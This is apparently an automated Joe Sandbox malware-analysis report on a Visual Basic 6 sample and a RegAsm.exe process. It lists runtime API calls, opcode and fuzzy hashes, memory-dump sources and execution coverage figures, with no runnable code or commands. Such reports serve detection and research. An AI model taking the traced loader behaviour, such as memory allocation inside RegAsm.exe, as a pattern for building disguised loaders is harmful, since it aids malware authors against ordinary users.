                                                                    • Instruction Fuzzy Hash: 82118F75540204AFEB01DFA4DE86F9E7FB8FB18708F100165F105FA2A1CA35AD40EB64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1D1
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1E9
                                                                    • __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F3
                                                                    • #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F9
                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D204
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkFreeNofreeVarg
                                                                    • String ID: W
                                                                    • API String ID: 1831340853-2402654308
                                                                    • Opcode ID: e808c745aa0593323adcec7fb224d4205008d5ff9b7d073a4c0137bfef03dfd5
                                                                    • Instruction ID: af982c6c61f84de2d0eeed4a108803e1e73d5a3a614292cc74b9c7801023e8d9
                                                                    • Opcode Fuzzy Hash: e808c745aa0593323adcec7fb224d4205008d5ff9b7d073a4c0137bfef03dfd5
                                                                    • Instruction Fuzzy Hash: 0EF05471840248FACB14EB91CC47F9F7F7CEB08748F10852AB205771A1DA78694186A4
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C0A2
                                                                      • Part of subcall function 0054C16A: __vbaChkstk.MSVBVM60(?,0054BB64,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054C170
                                                                    • #644.MSVBVM60(?,005539B5,?,?,?,?,00401006), ref: 0054C0C5
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000005,00000000,?,00000000,?,005539B5,?,?,?,?,00401006), ref: 0054C0F0
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054C101
                                                                    • #644.MSVBVM60(?,?,?), ref: 0054C117
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054C123
                                                                    Similarity
                                                                    • API ID: __vba$#644Chkstk$LockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 2226984211-0
                                                                    • Opcode ID: 94a996a5cd86e26a72164f9077ac95f0414b4fcf0ca18834adb9b901733c067f
                                                                    • Instruction ID: 8f0c33fb2cb5c9a3477ca9c6b9fca8a523aecd093b74544783286983c67b5029
                                                                    • Opcode Fuzzy Hash: 94a996a5cd86e26a72164f9077ac95f0414b4fcf0ca18834adb9b901733c067f
                                                                    • Instruction Fuzzy Hash: A6210E71940209ABDF44DFA8CD86FEE7BB8FF08748F14412AF500BB291D67999448B65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CD8C,?,?,?,?,?,?,?), ref: 0057D34B
                                                                      • Part of subcall function 0057D41B: __vbaChkstk.MSVBVM60(00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?,00401006,?,?,?,0054CD8C), ref: 0057D436
                                                                      • Part of subcall function 0057D41B: __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D46F
                                                                      • Part of subcall function 0057D41B: __vbaAryLock.MSVBVM60(00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?), ref: 0057D4D9
                                                                      • Part of subcall function 0057D41B: #644.MSVBVM60(?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D4F5
                                                                      • Part of subcall function 0057D41B: __vbaAryUnlock.MSVBVM60(00000016,?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D501
                                                                    • #644.MSVBVM60(?,00000016,?,?,?,?,00401006,?,?,?,0054CD8C,?,?,?,?,?), ref: 0057D389
                                                                    • #644.MSVBVM60(?,00000016,?,?,00000016,?,?,?,?,00401006,?,?,?,0054CD8C,?,?), ref: 0057D3A3
                                                                    • #644.MSVBVM60(00549287,00000016,?,?,00000016,?,?,00000016,?,?,?,?,00401006), ref: 0057D3C5
                                                                    • #644.MSVBVM60(?,?,?,00549287,00000016,?,?,00000016,?,?,00000016,?,?,?,?,00401006), ref: 0057D3DC
                                                                    • #644.MSVBVM60(?,?,?,?,00549287,00000016,?,?,00000016,?,?,00000016,?,?,?,?), ref: 0057D3E8
                                                                    Similarity
                                                                    • API ID: #644$__vba$Chkstk$LockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 2110399347-0
                                                                    • Opcode ID: 983f70ab617174a9a54e4f17c05007d03188a67f962ad8e41726d598eac6395f
                                                                    • Instruction ID: 6c03304b8f3dc70164b83b1602624dcd9af7e3f63e47b8d2fb8529a63fcbcd93
                                                                    • Opcode Fuzzy Hash: 983f70ab617174a9a54e4f17c05007d03188a67f962ad8e41726d598eac6395f
                                                                    • Instruction Fuzzy Hash: 3021E9B0C40209AFDF40DFA5C945AEFBAB9FF08344F108426F104B6251D77959019F65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C19E
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006), ref: 0054C1B6
                                                                    • __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 0054C1C0
                                                                    • #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401006), ref: 0054C1C6
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054C1DB
                                                                    • __vbaFreeStr.MSVBVM60 ref: 0054C1E3
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkFreeMoveNofreeVarg
                                                                    • String ID:
                                                                    • API String ID: 2413382268-0
                                                                    • Opcode ID: d7e1ba4c08c14f5785ee7417a10360ef3d3efb9498f41ba9673767473762ff6c
                                                                    • Instruction ID: f1241b988fa3b50461f7f14b0c32666c98d8bc1f53eb74c986954f501f240072
                                                                    • Opcode Fuzzy Hash: d7e1ba4c08c14f5785ee7417a10360ef3d3efb9498f41ba9673767473762ff6c
                                                                    • Instruction Fuzzy Hash: 91F0FF75800208ABCB15EBD6C846FDEBFBCBF48748F54452AF101B61A1DBB85645CB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?,00401006), ref: 0054D3A5
                                                                    • __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?), ref: 0054D3BA
                                                                    • __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3C3
                                                                    • __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3D8
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkMoveUbound
                                                                    • String ID: W
                                                                    • API String ID: 2614284155-2402654308
                                                                    • Opcode ID: b703f215554d68a9c61ba510fa19d8d8e3c7f9bf4e0a603e69dbcc4552ecefd0
                                                                    • Instruction ID: c3139827b9ac323ad44ba616676741dae91d5cd3a5d912c9f6fe5f13d274f031
                                                                    • Opcode Fuzzy Hash: b703f215554d68a9c61ba510fa19d8d8e3c7f9bf4e0a603e69dbcc4552ecefd0
                                                                    • Instruction Fuzzy Hash: 92F08C70840248BFDB11EF91CC46F8DBFB8FB08B48F10452AF100BA5A1D7B929008BA5
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?,00401006,?,?,?,0054CD8C), ref: 0057D436
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D46F
                                                                    • __vbaAryLock.MSVBVM60(00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?), ref: 0057D4D9
                                                                    • #644.MSVBVM60(?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D4F5
                                                                    • __vbaAryUnlock.MSVBVM60(00000016,?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D501
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkLockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 972739294-0
                                                                    • Opcode ID: 719e475dc55de300429c2546a323fbe43869b111c77b92af381720fabcddfc55
                                                                    • Instruction ID: e6c73999f4da42f1d13d175eed078c339e326b0dc60166821fe6e562e65bfa95
                                                                    • Opcode Fuzzy Hash: 719e475dc55de300429c2546a323fbe43869b111c77b92af381720fabcddfc55
                                                                    • Instruction Fuzzy Hash: 5631FB78A002059FDB04CF58EC81FAD7BF5FB08318F14855AE509AB3A2DB75E880EB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054F52A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 0054F56B
                                                                    • __vbaObjSetAddref.MSVBVM60(?,0057E3A8), ref: 0054F58F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0054F5B8
                                                                    • __vbaFreeObj.MSVBVM60 ref: 0054F5C9
                                                                    Similarity
                                                                    • API ID: __vba$AddrefCheckChkstkFreeHresultNew2
                                                                    • String ID:
                                                                    • API String ID: 3149954519-0
                                                                    • Opcode ID: 995c27a4e961136fcff36fc589c1baeec5b886c040a38b9eb225f203851ea94c
                                                                    • Instruction ID: 77ed029945c8efc2dff3500f63b80e3daf343d6c340a12107d027f5788801437
                                                                    • Opcode Fuzzy Hash: 995c27a4e961136fcff36fc589c1baeec5b886c040a38b9eb225f203851ea94c
                                                                    • Instruction Fuzzy Hash: 1621E470900208EFCB10DFA9D956BEDBFB4FB08748F10842AF509BB2A0C37899549F94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60 ref: 0057D256
                                                                    • #644.MSVBVM60(?), ref: 0057D25F
                                                                    • #644.MSVBVM60(?,0054AC70,00000000,?), ref: 0057D274
                                                                    • #644.MSVBVM60(?,0054AC90,00000000,?,0054AC70,00000000,?), ref: 0057D289
                                                                    • #644.MSVBVM60(?,0054AC80,00000000,?,0054AC90,00000000,?,0054AC70,00000000,?), ref: 0057D2A2
                                                                      • Part of subcall function 0057D2D1: __vbaChkstk.MSVBVM60(?,0057D2B4,?,?,0054AC80,00000000,?,0054AC90,00000000,?,0054AC70,00000000,?), ref: 0057D2D7
                                                                    Similarity
                                                                    • API ID: #644$Chkstk__vba
                                                                    • String ID:
                                                                    • API String ID: 1305800526-0
                                                                    • Opcode ID: 3f2d00f84b847e8ae39aa272949e2ef526bab372e84644abb87a3c920caaa3c1
                                                                    • Instruction ID: 3b14fb139c3a1e45484f0b7d5adbaf8ed892dbce584cffb3a9499ea8aba0e7c1
                                                                    • Opcode Fuzzy Hash: 3f2d00f84b847e8ae39aa272949e2ef526bab372e84644abb87a3c920caaa3c1
                                                                    • Instruction Fuzzy Hash: CE014F71940209BFEB51AF60DC82EAE7F74FF04398F108125FD04AA161C6759D1096A5
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054AE98
                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,00401006), ref: 0054AEB0
                                                                    • #717.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401006), ref: 0054AEC4
                                                                    • __vbaVarMove.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401006), ref: 0054AECF
                                                                    • __vbaFreeVar.MSVBVM60(0054AEFF,?,00000000,00000080,00000000,?,?,?,?,00401006), ref: 0054AEF9
                                                                    Similarity
                                                                    • API ID: __vba$#717ChkstkFreeMove
                                                                    • String ID:
                                                                    • API String ID: 3540157982-0
                                                                    • Opcode ID: 33e6b09f80c1add19c6ad179ccdcfc45ec4aa2b82ec43b88bbbc1ed25375df1b
                                                                    • Instruction ID: 05fe1289c4fe5bb7745df040b5973151ba910a6ef276fb2ee4496ad895f3301a
                                                                    • Opcode Fuzzy Hash: 33e6b09f80c1add19c6ad179ccdcfc45ec4aa2b82ec43b88bbbc1ed25375df1b
                                                                    • Instruction Fuzzy Hash: FDF06231880248BACB11EB91C942FCEBB7CFB14B48F50456AF001B64D1DA786A088B55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054E50F
                                                                    • #717.MSVBVM60(?,?,00000040,00000000,?,?,?,?,00401006), ref: 0054E52C
                                                                    • __vbaVarMove.MSVBVM60(?,?,00000040,00000000,?,?,?,?,00401006), ref: 0054E537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#717ChkstkMove
                                                                    • String ID: HW
                                                                    • API String ID: 3640671369-1255872628
                                                                    • Opcode ID: 8bc517829fc4d47701092136363c780debf660f647e3beda170b32d9a4b87d55
                                                                    • Instruction ID: b5ff55e2a0a6215b39c7051d8006765ff41dbdf04347eb0a237106806d3b5b52
                                                                    • Opcode Fuzzy Hash: 8bc517829fc4d47701092136363c780debf660f647e3beda170b32d9a4b87d55
                                                                    • Instruction Fuzzy Hash: 9FF03071980348BACB10EB95CD47FCDBB7CBB04B48F50886AB104B6591D6B969058B58
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0057D0FE
                                                                    • #595.MSVBVM60(?,00401006,?,0000000A,0000000A), ref: 0057D13F
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,00401006,?,0000000A,0000000A), ref: 0057D154
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,00401006,?,0000000A,0000000A), ref: 0057D163
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#595ChkstkFreeListMove
                                                                    • String ID:
                                                                    • API String ID: 2550330671-0
                                                                    • Opcode ID: 08060c4bc8039888ac434c1447b6bcb412fdd457d498d7ed0a810e6425da5f27
                                                                    • Instruction ID: 632d0c11abbd343be3cad4f2ac46968a186bc1afa364e5119c49d4e8c4163a6d
                                                                    • Opcode Fuzzy Hash: 08060c4bc8039888ac434c1447b6bcb412fdd457d498d7ed0a810e6425da5f27
                                                                    • Instruction Fuzzy Hash: F90157B1800248ABDB01DF91E946BCEBBB9EF04704F60852AF504B6191D3795A04CF65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054C4CA
                                                                    • __vbaSetSystemError.MSVBVM60 ref: 0054C4D7
                                                                    • __vbaSetSystemError.MSVBVM60(000001F4), ref: 0054C4EC
                                                                    • __vbaSetSystemError.MSVBVM60(000001F4), ref: 0054C4F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$Chkstk
                                                                    • String ID:
                                                                    • API String ID: 2749639637-0
                                                                    • Opcode ID: 67c88c8678b3816b67fce942dffdb7424d6f3d145085b8e81d73168c1fd07f5b
                                                                    • Instruction ID: 167fabb3480963c0532fbb014ba96de32cbd359a3d750e209762ba9942f01327
                                                                    • Opcode Fuzzy Hash: 67c88c8678b3816b67fce942dffdb7424d6f3d145085b8e81d73168c1fd07f5b
                                                                    • Instruction Fuzzy Hash: E4F07074D0030AEADF00EBF5C9455DDBBB4BF04748F10456AE550BB291DB799A408B55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ACEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Chkstk__vba
                                                                    • String ID: W$W
                                                                    • API String ID: 1959723978-3854619544
                                                                    • Opcode ID: f9466ddc4f523cf730584f6e062ab94fe7970b3abecc588e31f93eb27ebc7194
                                                                    • Instruction ID: 5e3d41e47ed38e3d7adb32910897f13f3f2918b9d04f8fb0645be6f47cec0533
                                                                    • Opcode Fuzzy Hash: f9466ddc4f523cf730584f6e062ab94fe7970b3abecc588e31f93eb27ebc7194
                                                                    • Instruction Fuzzy Hash: DF01D675A00648EFCB01DF58C946B8DBFF4FB08794F108465F809DB650C335AA40CB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0055317C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Chkstk__vba
                                                                    • String ID: XW$XW
                                                                    • API String ID: 1959723978-594280377
                                                                    • Opcode ID: 61cf63773496fc83a4221ad31ea967d175b71bcb02c571d9aebff492ce353bca
                                                                    • Instruction ID: 514b4ad9638f6f6d7debc9d2606c0dc11d66edea9af3b5ff2568f4f3154ab096
                                                                    • Opcode Fuzzy Hash: 61cf63773496fc83a4221ad31ea967d175b71bcb02c571d9aebff492ce353bca
                                                                    • Instruction Fuzzy Hash: 1F01D675A00648EFCB01DF59C546B8DBFF4FB08794F108465F809DB650C375AA408B94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005531EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Chkstk__vba
                                                                    • String ID: `W$`W
                                                                    • API String ID: 1959723978-546547367
                                                                    • Opcode ID: 8f69785c7c8fd6a7404530031fbdb4ed4262bf54e25681932da6af3f3a0ade19
                                                                    • Instruction ID: 6e1140320548d24654d2e68ae4615a090845963bd47da4fd00c8c3ad786d7ddf
                                                                    • Opcode Fuzzy Hash: 8f69785c7c8fd6a7404530031fbdb4ed4262bf54e25681932da6af3f3a0ade19
                                                                    • Instruction Fuzzy Hash: 1901D675A00648EFCB11DF58C546B8DBFF4FB08794F108465F809DB650C335AA408B94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BD83
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,0057F210,00000011,00000001,0000003F,00000000,?,?,?,?,00401006), ref: 0054BDA9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkRedim
                                                                    • String ID: XW
                                                                    • API String ID: 253803413-708546550
                                                                    • Opcode ID: 44db4609b1435de30a5a374587905f2891474fb50a27c2c5159ecbec4bc16b3b
                                                                    • Instruction ID: 8a346568657ca714917985bc2c07687727308a8c2364c91a2c34258540d36eaf
                                                                    • Opcode Fuzzy Hash: 44db4609b1435de30a5a374587905f2891474fb50a27c2c5159ecbec4bc16b3b
                                                                    • Instruction Fuzzy Hash: 47E0D870BD0344B6F5249B458C47F967E6CFB14F44F2044A9F3007A5C2D2FA65405165

                                                                    Execution Graph

                                                                    Execution Coverage:8.4%
                                                                    Dynamic/Decrypted Code Coverage:81.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:107
                                                                    Total number of Limit Nodes:9

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q$$q$$q
                                                                    • API String ID: 0-2069967915
                                                                    • Opcode ID: b9140e316d41bd5528f12802c4beac23d31d17d5b4bc957728219fc1e8fb14f7
                                                                    • Instruction ID: ed87fd24629fe6e54a53b2960cd02ae4ba6ae8848b10867555b3015e8c16399f
                                                                    • Opcode Fuzzy Hash: b9140e316d41bd5528f12802c4beac23d31d17d5b4bc957728219fc1e8fb14f7
                                                                    • Instruction Fuzzy Hash: FC322E35E107198FDB14EF69D89469DF7B2FF89300F20C669E549A7215EB30E985CB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3
                                                                    • API String ID: 0-1842515611
                                                                    • Opcode ID: 7a8e860d296e067dde51a0d37345777b5aff423104cd614ef60911866102606b
                                                                    • Instruction ID: ed23984c0101fe67288bc6f147234a91c63873dd0fd58c0c77a860a101816f4f
                                                                    • Opcode Fuzzy Hash: 7a8e860d296e067dde51a0d37345777b5aff423104cd614ef60911866102606b
                                                                    • Instruction Fuzzy Hash: 8E53FA31C10B1A8ADB51EF68C890699F7B1FF99300F15D79AE4587B121FB70AAD4CB81

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q
                                                                    • API String ID: 0-3126353813

                                                                    Control-flow Graph

[Control-flow graph: first block 68ce0d9-68ce0e6; calls 68cd1b8, 68cd094]
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xq$$q
                                                                    • API String ID: 0-855381642
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $
                                                                    • API String ID: 0-3993045852
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(000000FF), ref: 00443C36
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2536620293.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_440000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0

                                                                    Control-flow Graph

[Control-flow graph: first block 6a1d490-6a1d494; calls 6a1a464, CreateWindowExW]
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

[Control-flow graph: first block 68ce571-68ce58b; calls 68cd1c8, 68cd1d4, GlobalMemoryStatusEx]
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

[Control-flow graph: first block 6a1a464-6a1d556; calls CreateWindowExW]
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A1D602
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0

                                                                    Control-flow Graph

[Control-flow graph: first block 6a1e46c-6a1fc6c; calls 6a1a48c, CallWindowProcW]
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06A1FCF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0

                                                                    Control-flow Graph

[Control-flow graph: first block 68ce658-68ce696; calls GlobalMemoryStatusEx]
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000068E), ref: 068CE6BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    • Opcode ID: 03738c09b341170a38c8aabefbc46a47c0c3251c1a2997030216ad6348a4d6a5
                                                                    • Instruction ID: edca7b8cecb9737660e59ba409107a0370469f1f73aded2b553f8475e99a01d9
                                                                    • Opcode Fuzzy Hash: 03738c09b341170a38c8aabefbc46a47c0c3251c1a2997030216ad6348a4d6a5
                                                                    • Instruction Fuzzy Hash: 68316E30E502099BDB14CF69C5607AEF7B2EF86304F20D929E802EF250EB74AD418B51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
